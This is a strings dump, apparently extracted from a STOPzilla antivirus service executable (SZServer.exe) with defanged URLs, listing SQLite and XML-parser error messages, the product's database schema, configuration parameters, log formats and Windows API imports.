too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
PRIMARY KEY missing on table %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
cannot create a TEMP index on non-TEMP table "%s"
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
%s.%s
%s.rowid
unable to identify the object to be reindexed
duplicate WITH table name: %s
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch - "%w" referencing "%w"
table %S has no column named %s
table %S has %d columns but %d values were supplied
%d values for %d columns
sqlite3_extension_init
unable to open shared library [%s]
sqlite3_
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
defer_foreign_keys
foreign_key_check
foreign_key_list
foreign_keys
*** in database %s ***
NULL value in %s.%s
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
column%d
%s:%d
SELECTs to the left and right of %s do not have the same number of result columns
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
no such index: %s
multiple references to recursive table: %s
circular reference: %s
table %s has %d values for %d columns
multiple recursive references: %s
recursive reference in a subquery: %s
sqlite_sq_%p
too many references to "%s": max 65535
%s.%s.%s
no such table: %s
SCAN TABLE %s%s%s
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
automatic index on %s(%s)
table %s: xBestIndex returned an invalid plan
ANY(%s)
SUBQUERY %d
TABLE %s
AS %s
PRIMARY KEY
COVERING INDEX %s
INDEX %s
USING INTEGER PRIMARY KEY
VIRTUAL TABLE INDEX %d:%s
%s.xBestIndex() malfunction
at most %d tables in a join
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
operator >> (CSZVinaryData& failure
CSZApplicationPipeServer::Reply
CSZApplicationPipeServer::GetWrapper
CSZHomeServiceComponentResult::ParseTokenKey
pipe-name
key-invalid
key-inactive
key-in-use
key-mismatch
external.product
external.edition
external.affiliate_id
external.downloader_id
external.reseller_id
CSZStoredAction::Execute
CSZServiceApplication::ImportExternalConfig
client.presence.interactive
client.presence.helper
CSZAppDB::ExecuteMigrationCode
last-execute-time
last-execute-result
last-execute-result-text
stored-action.saved
never-executed
CSZApplicationPipeClient::_Execute
pipe.closed
CSZApplicationPipeClient::GetWrapper
CSZApplicationPipeClient::OnPacket
external.home_service_url
stored-action.deleted
Support
CSZHomeServiceLicense::ExtractSupport
update.binaries.full
update.binaries.incremental
u-u-uTu:u:u
SMTPErrorString
CloseEmailWindowMsg
BadUrlReplacementText
BadUrlCheckingEnabled
BadUrlActionEnum
WindowsLiveMailClientEnabled
Port
BaseURL
LogToWindowsEventLog
Password
vipre.ap.disabled
vipre.ap.enabled
vipre.ap.snoozed
vipre.targets.up_to_date
CSZPipeClient::OnReadProc
CSZPipeClient::ReadData
CSZPipeClient::ReadProc
CSZPipeClient::WriteProc
X:\sz7.0.1.3\Build7\Release\x86\SZServer.pdb
KERNEL32.dll
MsgWaitForMultipleObjectsEx
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCP120.dll
RPCRT4.dll
MPR.dll
MSVCR120.dll
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
WTSAPI32.dll
USERENV.dll
CreateNamedPipeW
ConnectNamedPipe
WaitNamedPipeW
DisconnectNamedPipe
VERSION.dll
.?AVDelegate@CSZApplicationPipeServer@@
.?AVCSZSQLDatabase@@
.PAVbad_cast@std@@
.PAVexception@std@@
.PAVrange_error@std@@
.PAVruntime_error@std@@
.?AVListener@CSZApplicationPipeServer@@
.?AVCSZPWKeyValueNotify@@
.?AVCSZSQLStatement@@
.?AVCSZPacketPipeServer@@
.?AVCSZPipeServer@@
.?AVCSZApplicationPipeServer@@
.?AVCSZPipeClient@@
.?AVCSZPacketPipeClient@@
.?AVCSZPacketPipeConnection@@
.?AVCSZPipeConnection@@
.?AVCSZApplicationPipeClient@@
.?AV?$TSZThreadQueue@VCSZPWHttpRetryRequest@@@@
.?AV?$TSZThreadQueue@USSZPendingHTTPRequest@@@@
.?AVDelegate@?$TSZThreadQueue@VCSZPWHttpRetryRequest@@@@
.?AVDelegate@?$TSZThreadQueue@USSZPendingHTTPRequest@@@@
.?AVCSZPWHttpResponse@@
.?AVCSZPWHttpRetryRequest@@
.?AVCSZPWHttpStatus@@
.?AVCSQLMigrationStep@@
.?AVCSZPWHttpRequest@@
.?AVCSZPWHttpRetryResponse@@
.?AVCVIPREWebFilterEvents@@
.?AU_ISBWebFilterEvents@@
.?AVCSZPipeServerThread@CSZPipeServer@@
.?AVCSZPipeConnectionThread@CSZPipeConnection@@
.?AVIO@CSZPipeClient@@
.?AVCMD5Checksum@@
<config include="common.xml">
<names include="common-names.xml">
<name descriptor="log-file"><![CDATA[sz7.log]]></name>
<name descriptor="msi-log-file"><![CDATA[sz7-msi.log]]></name>
<databases default="config" include="databases.xml" />
<s><![CDATA[<Component class="{{CLASS}}" option="{{OPTION}}"><License key="{{KEY}}" /></Component>]]></s>
<name descriptor="db-file"><![CDATA[sz7.data]]></name>
<name descriptor="pipe-name"><![CDATA[sz7-pipe]]></name>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB, user TEXT DEFAULT '')]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key,user)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX message_pk ON home_message(message_id)]]></sql>
<sql><![CDATA[CREATE INDEX message_read_k ON home_message(read_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_expires_k ON home_message(expires_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_type_k ON home_message(resource_type)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS stored_actions(id TEXT PRIMARY KEY UNIQUE NOT NULL, type TEXT NOT NULL, name TEXT NOT NULL, xml TEXT NOT NULL)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX stored_id_pk ON stored_actions(id)]]></sql>
<sql><![CDATA[CREATE INDEX stored_type_k ON stored_actions(type)]]></sql>
<value name="vipre.config.scan.known-apps.reset">true</value>
<sql><![CDATA[CREATE TABLE zilla_system(value TEXT, data TEXT)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX zilla_system_index ON zilla_system(value)]]></sql>
<sql><![CDATA[REPLACE INTO zilla_system (value, data) VALUES("db_version", "1.0.0.0")]]></sql>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key)]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS zilla_system]]></sql>
<sql><![CDATA[ALTER TABLE kv_data ADD COLUMN user TEXT DEFAULT '']]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS kv_data_key_index]]></sql>
<sql><![CDATA[DELETE FROM kv_data]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, home_id INTEGER, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, data TEXT, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE INDEX message_home_pk ON home_message(home_id)]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_home_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_read_k]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_expires_k]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS home_message]]></sql>
<sql><![CDATA[DELETE FROM stored_actions]]></sql>
<param name='home_service_url'><![CDATA[hXXps://home.is3.com]]></param>
<param name='msi_version_guid'><![CDATA[{CBE0E059-EEEA-447D-AEA3-A416112756E6}]]></param>
<param name='url_web_home'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_store'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=store&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_chat'><![CDATA[hXXp://VVV.stopzilla.com/director/?type=LIVE_CHAT&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_support'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=support&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_help'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=help&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_purchase'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=purchase&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_renew'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=renew&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_survey'><![CDATA[hXXp://VVV.stopzilla.com/AV7-uninstall-survey/]]></param>
<param name='url_register'><![CDATA[hXXp://VVV.stopzilla.com/register/antivirus]]></param>
<param name='email_support'><![CDATA[support@stopzilla.com]]></param>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
%hs: ApplyThreatUpdateBlocking %s; definitions unchanged from %d
%hs: ApplyThreatUpdateBlocking %s; definitions updated from %d to %d, but expected %d
%hs: ApplyThreatUpdateBlocking %s; definitions updated from %d to %d
%hs: missing full update required from version %d to (at least) %d
%hs: full update to (at least) version %d required; update to version %d found
%hs: non-sequential incremental update; expected %d, got %d
Legacy DB: Failed to compile statement '%s' [%u|%s]
Legacy DB: Failed to get value '%hs' for user '%hs' [%d|%s]
Legacy DB: Failed to get system value '%hs' [%d|%s]
Scan Thread: Awakened with scan request (0xX).
scan_clean.xml
%SystemDrive%\Program Files
%SystemDrive%\Program Files (x86)
%SystemDrive%\Windows
%SystemDrive%\programdata
%SystemDrive%\users
%SystemDrive%\documents and settings
settings.scan.low-severity
settings.scan.root-kits
settings.scan.low-priority
settings.scan.update
settings.scan.archives
settings.scan.auto-clean
settings.scan.reboot-after-clean
settings.scan.cookies
settings.scan.removable
settings.app.battery-power
%hs: stored scan '%s' (type %d) started.
%hs: stored scan '%s' (type %d) failed to start (ERROR)
%hs: stored scan '%s' (type %d) failed to start (BUSY)
%hs: stored scan '%s' (type %d) failed to start (CHECKING_FOR_UPDATES)
%hs: stored scan '%s' (type %d) failed to start (REBOOT_REQUIRED)
%hs: stored scan '%s' (type %d) failed to start (RUNNING)
ServerAction: Action recieved (%d).
ServerAction: Unknown action (%d).
%hs: Unexpected result from wait (%u).
updates.vipre-targets.available
GFI.Tools.Run64.exe
SBSetupDrivers.exe" /update /HIPS /ARVA /FW /AP
SBSetupDrivers.exe
VIPRE Reporting drivers already installed.
SBSetupDrivers.exe" /install /HIPS /ARVA /FW /AP
SBSetupDrivers.exe" /uninstall /HIPS /ARVA /FW /AP
Executed: (Exit Code - %u) "%s" %s
Failed to get exit code executing: "%s" %s
Wait failed executing: (0xX) "%s" %s
Error executing: "%s" %s
Session: New session (%u) (First Run: %s)
STOPzilla.exe
Session: Unable to start '%s' [%u|%s].
Session: Closed session (%u)
license.legacy_check
Licensing: Imported legacy instance key '%s'.
license.legacy_imported
VIPRE: Request to toggle AV (Enable: %s).
VIPRE: Request to toggle AV Executing (Enable: %s).
VIPRE: AP Status change (%d).
VIPRE: AP State change (%d).
%d-%m-%Y %H:%M
System Boot: First Boot - Local Time: %s
System Boot: Rebooted - Local Time: %s
System Boot: System did not reboot - Local Time: %s.
userdata.db
VIPRE Infection: %s
%hs(%d)
[%d/%m/%Y %H:%M:%S]
(%s%s%s%s%s):
%hs: '%s' (0xX)
%hs: unable to compile empty or missing SQL statement
%hs: failed to compile '%s' [%d|%hs]
"%s" %s
explorer.exe
hkcu\software\microsoft\windows\shell\associations\urlassociations\http\userchoice
hkcr\http\shell\open\command
%hs(%d): failed [%u|%s]
%hs(%u, %u): failed [%u|%s]
Kernel32.dll
s%s%s
%s%s%s%s
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
application-pipe-server
%hs: no wrapper for opCode %u
%hs: failed to download '%s' from '%hs' [%u|%s]
%hs: failed to decode '%s' from '%hs' [%u|%s]
%hs: failed to open '%s' [%u|%s]
%hs: failed to get length of '%s' [%u|%s]
%hs: failed to verify length of '%s'; expected %I64u but got %I64u instead [%u|%s]
%hs: failed to compute hash of '%s' [%u|%s]
%hs: failed to verify hash of '%s'; expected '%hs' but got '%hs' instead [%u|%s]
%hs: downloaded '%s' from '%hs' to '%s', with size %I64u
%hs: downloaded '%s' from '%hs' to '%s', with size %I64u and %s hash '%hs'
%hs: ENCODING_ZFZIP specified; failed to open archive '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; archive does not contain '%s'
%hs: ENCODING_ZFZIP specified; failed to create/open unique file '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; failed to extract file '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; failed to write file '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; '%s' extracted from '%s' into '%s'
.available
.timestamp
%hs: component '%hs' skipped with result %d
%hs: failed to delete file '%s' [%u|%s]
%hs: no token key provided
%hs: unexpected token key '%hs'
SetProcessAffinityMask failed [%u|%s]
Working Directory: %s
CSZLogManager::Initialize(0x%X) failed [%u|%s]
ConstructLogFile(%s) failed [%u|%s]
support.phone.%
support.phone.
%hs: duplicate component (%d|%hs)
%hs: unable to parse received action content '%hs' [%u]
%hs: attempt to execute an action with no implementation!
%hs: %hs named '%s' updated to %u
external.override.scheduled.updates.interval
scheduled.phone-home.get.
Error: Unexpected message loop (0xX).
Install complete (%d).
Upgrade complete (%d).
default_external_config.xml
Default External Config: Document not found 'default_external_config.xml'.
External Config: 'external.product' found. Bypassing default external config load.
Failed to import property '%s'
Unsuccessful import of SZSetup supplied external config
Rejected external property '%s' with value '%s'
Importing external property '%s' with value '%s' as '%s'
Importing external property '%s' with value '%s'
%s Initializing
AllocConsole() failed [%u|%s]
Unhandled exception processing console command: %s
Unrecognized console command: %s
StartServiceCtrlDispatcher failed [%u|%s]
%hs(%s, %u)
%hs(%u, %u)
SetServiceStatus failed [%u|%s]
Could not create event '%s'.
Unable to start pipe server.
/sz_pipe
External Config: Failed to connect to SZSetup.exe '%s'. (%u)
%s Version: %s
%s Product Version: %s
OS: %s
CPU Type: %s
CPU Count: %d
CPU Cores: %d
CPU Logical Cores: %d
Memory Total: %d MB
Memory Available: %d MB
Memory Page File: %d MB
%hs: Replacing client session information for process %u
%hs: Caching client session information for process %u
%hs: discarding client information for terminating process %u
%hs: uncached client with process ID %u
%hs: discarding client information for disconnected process %u
Failed: %s
Exception: %s
%s in transaction
Licensing: Update License: valid(X) instance(%s) type(%d) start_date(%I64d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d)
INSERT INTO migration_history (version, phase) VALUES (%d, %d)
Failed to get value '%hs' for user '%hs' [%d|%s]
Failed to get system value '%hs' [%d|%s]
Failed to set value '%hs' for user '%hs' [%u|%s]
Failed to set system value '%hs' [%u|%s]
Failed to delete value '%hs' for user '%hs' [%u|%s]
Failed to delete system value '%hs' [%u|%s]
Failed to delete %hs keys %s %s [%u|%s]
Failed to write message %d [%u|%s]
'%s' cannot be opened and cannot be set aside
'%s' set aside but new file not opened
'%s' set aside and recreated
'%s' not created
No phase %d (%hs) migration necessary; current migration is %d
Phase %d (%hs) migration mismatch - DB is %d and application is %d
'%s' cannot be set aside
Migrated phase %d (%hs) from version %d to %d
SELECT value_type, value_data FROM kv_data WHERE user=? AND key=?
SELECT key, value_type, value_data FROM kv_data WHERE user=? AND key LIKE ?
REPLACE INTO kv_data (user, key, value_type, value_data) VALUES (?, ?, ?, ?)
DELETE FROM kv_data WHERE user=? AND key=?
DELETE FROM kv_data WHERE user=? AND key LIKE ?
DELETE FROM kv_data WHERE user=? AND key NOT LIKE ?
Failed to compile statement '%s' [%u|%s]
Failed to execute statement '%s' [%u|%s]
%hs: CreateFile('%s') failed [%u|%s]
CONFIG.XML
%hs: invalid option '%c' for component (%d/%hs)
%hs: option '%c' for component (%d/%hs) requires value for variable %hs
%hs: option '%c' for component (%d/%hs) contains unbalanced variable delimiters
application-pipe-client
%hs: wait failed with unexpected result %u
%hs: unhandled incoming packet - opCode(%u)
SZNetAssistant.exe
%hs: hang up request for incorrect context; expected %u and got %u
%hs: request with context %u and payload '%hs' rejected by context %u
%hs: no database available for SQL statement '%s'
%hs: failed to compile SQL statement '%s'
%hs: found duplicate name '%s' for type '%hs'
%hs: timer %I64u scheduled action '%s' to run in %ums
%hs: not scheduling action '%s' because it reported no future interval
%hs: executing action '%s'
%hs: no action to execute
Failed to execute function '%hs' [%u|%s]
Failed to set value '%hs' [%u|%s]
%hs: unsupported step '%hs'
SZFileAssistant.exe
%hs: missing file '%s' required
%hs: can't compute hash of '%s'; getting file
%hs: modified file '%s' required
%hs: failed to create folder '%s' [%u|%s]
external.type
external.validation.file
external.validation.version
external.timestamp
%hs: internal error - import failed
%hs: updated license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d)
%hs: failed to update license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d) [%u|%s]
%hs: duplicate region key '%s'
%hs: missing value for region '%s' and status '%hs'
%hs: invalid status value '%hs' for region '%s'
%hs: missing %d of %d expected statuses in region '%s'
%hs: assistant '%s' being destroyed with %u clients
%hs: failed to launch assistant '%s' [%u|%s]
%hs: failure after launching assistant '%s' [%u|%s]
%hs: incremented open count (%u) for assistant '%s'
%hs: reusing connection for assistant '%s'
%hs: attempt to release unopened assistant '%s'
%hs: decrementing open count (%u) for assistant '%s'
%hs: invalid response opcode; expected %u, got %u
%hs: not closing assistant '%s' because its open count is %u
%hs: cannot reply to missing ack in assistant '%s'!
%hs: TerminateProcess failed on process %u [%u|%s]
%hs: ExecuteUserProcess('%s', '%s', %s, %u, %d, %s, &m_process, &m_pid) failed [%u|%s]
%hs: ExecuteSystemProcess('%s', '%s', %s, %s, &m_process, &m_pid) failed [%u|%s]
%hs: wait for '%s' interrupted by Close request
%hs: wait for '%s' interrupted by shutdown request
%hs: wait for '%s' interrupted by its' own termination
%hs: wait for '%s' interrupted for unexpected reason [%u]
%hs: parse error on markup '%hs' [%u|%s]
%hs: element '%hs' not supported by config object factory
%hs: failed to delete '%s' [%u|%s]
\msiexec.exe
%hs: failed to launch msiexec [%u|%s]
%hs: '%s' opened without an ack!
Global\update.binaries.skip_wait
%hs: waiting %u ms before applying updates
%hs: Warn did NOT timeout (%u)
%hs: file '%s' not found
updates.binaries.
%hs: [empty original] %s
%hs: [remove] %s
%hs: [missing replacement] %s
%hs: [add] %s
%hs: [replace] %s
%hs: moved '%s' to '%s'
%hs: failed to move '%s' to '%s' [%u|%s]
%hs: failed to locate '%s' [%u|%s]
%hs: failed to reset dacl on '%s' [%u|%s]
%hs: failed to remove '%s' [%u|%s]
%hs: deleted '%s'
CreateInstance(CLSID_SBService) returned 0xX
CreateInstance(CLSID_SBLogger) returned 0xX
CreateInstance(CLSID_SBActiveProtection) returned 0xX
CreateInstance(CLSID_SBScanControl) returned 0xX
CreateInstance(CLSID_SBQuarantine) returned 0xX
CreateInstance(CLSID_SBRegistration) returned 0xX
CreateInstance(CLSID_SBSoftwareUpdates) returned 0xX
CreateInstance(CLSID_SBThreatDefinitions) returned 0xX
CreateInstance(CLSID_SBVipre) returned 0xX
CreateInstance(CLSID_SBWSC) returned 0xX
CreateInstance(CLSID_SBEmailAV) returned 0xX
CreateInstance(CLSID_SBFirewall) returned 0xX
CreateInstance(CLSID_SBWebFilter) returned 0xX
CreateInstance(CLSID_SBHIPS) returned 0xX
CreateInstance(CLSID_SBLanGuard) returned 0xX
Released ISBFirewallWebFilter
vipre.config.scan.known-apps.reset
%hs: VIPRE failure [0xX|%s]
VIPRE: Error communicating to set back the config: %s
Incompatibles Check: Did not find program data in '%s' or '%s'
EnableAP() returned 0xX
DisableAP() returned 0xX
%hs: file error [%u|%s]
IncompatiblePrograms.dll
incompats.dat
Incompatibles Check: Found '%s' but not '%s'
Incompatibles Check: Found but did not load '%s' [%u|%s]
Incompatibles Check: '%s' does not contain function '%hs'
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been cleaned.%CRLF%Definitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been quarantined. You can unquarantine this suspicious file from the %PRODUCT% application.%CRLF%Definition Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been deleted.%CRLF%Definitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCT% Anti-phishing removed a known bad URL from your email message. It was deleted or quarantined and replaced with this message.
SZWSC.exe
%hs: not launching '%s' - no arguments
%hs: failed to launch '%s' with arguments '%s' [%u|%s]
%hs: launched '%s' with arguments '%s'
%hs: waiting for '%s' to finish...
%hs: unexpected wait termination [%u]
%hs: OpenSCManager failed [%u|%s]
%hs: OpenService failed [%u|%s]
Advapi32.dll
%hs: unable to load Advapi32.dll
%hs: queue '%s', index %u - thread 0x%X started
%hs: queue '%s', index %u - wait failed with result %u
%hs: queue '%s', index %u - thread 0x%X ending
%hs: queue '%s' - attempt to start while abort is signalled
%hs: queue '%s', index %u - failed to start [%u|%s]
%hs: queue '%s', index %u - thread completed
\\.\pipe\
dbghelp.dll
%s%d.dmp
%s%d.log
Unhandled Exception: Code(0xX) Addess(0xX)
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows .Net
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 8
Windows 8.1
Windows 10
Windows 2012 Server
Windows 2012 Server R2
Web Server
%s ~%d MHZ
GetLogicalProcessorInformation is not supported.
Unable to determine windows version
%u.%u.%u
kernel32.dll
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Web Server Edition
Windows Server 2003 R2,
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003,
Web Edition
Windows XP
Windows 2000
(build %d)
%hs: expected sequence number greater than or equal to %u; got %u instead
%hs: packet %u of request %u indicated no more data when %u packets remain.
[Client]: Closing connection (0xX).
[Client]: Open connection (0xX).
%hs: async read failed [%u|%s]
%hs: failed to process %u transfered bytes
%hs: ReadFileEx failed [%u|%s]
%hs: expected packet buffer of %u bytes; got %u bytes
%hs: expected packet size in %u bytes; got %u bytes
%hs: received %u bytes; 0 expected
C:\ProgramData\STOPzilla!\dumps\SZServer.exefatal
7.0.1.3
SZServer.exe
SBAMSvc.exe_3448:
.text
`.rdata
@.data
.rsrc
@.reloc
ffff28a4-0506-49af-8a0f-dfa9a4188c50
SbWF_AddPort
SbWF_ClearPorts
SbFweIds_LogPortScans
SbFwe_LogPacketsToUnopenedPorts
Unsupported XML version
XML character encoding not supported
xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance"
line:%d-'
External Entity definitions not supported
Visual C CRT: Not enough memory to complete call to strerror.
GetProcessWindowStation
portuguese-brazilian
operator
unterminated entity reference s
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://
PTF://
default%d
%.20s%d
http-equiv
@/:=?;#%&,
dot operator, U 22C5 ISOamsb
tilde operator = varies with = similar to, U 223C ISOtech
proportional to, U 221D ISOtech
asterisk operator, U 2217 ISOtech
zero width joiner, U 200D NEW RFC 2070
zero width non-joiner, U 200C NEW RFC 2070
pluginurl
accesskey
onkeyup
onkeydown
onkeypress
Memory allocation failed : %s
HTTP-EQUIV
Char 0x%X out of allowed range
Unsupported encoding %s
Bytes: 0xX 0xX 0xX 0xX
Bytes: 0xX
Opening and ending tag mismatch: %s and %s
hXXp://VVV.w3.org/TR/REC-html40/loose.dtd
Element %s embeds close tag
Invalid char in CDATA 0x%X
ParsePI: PI %s space expected
ParsePI: PI %s never end ...
htmlParseCharRef: invalid xmlChar value %d
Attribute %s redefined
Unexpected end tag : %s
Tag %s invalid
Couldn't find end of Start Tag %s
Internal error, xmlCopyCharMultiByte 0x%X out of bound
encoding not supported %s
new input from entity: %s
Cannot parse entity %s
Internal entity %s without content !
Internal parameter entity %s without content !
Predefined entity %s without content !
new input from file: %s
failed to load external entity "%s"
Found NULL content in content model of %s
Found PCDATA in content model of %s
ContentModel broken for element %s
Cannot create automata for element %s
Content model of %s is not determinist: %s
Redefinition of element %s
Element %s has too many ID attributes defined : %s
Attribute %s of %s: invalid default value
Attribute %s of element %s: already defined
Element %s has too may ID attributes defined : %s
xmlAddNotationDecl: %s already defined
ID %s already defined
NOTATION %s is not declared
ENTITY attribute %s reference an unknown entity "%s"
ENTITY attribute %s reference an entity "%s" of wrong type
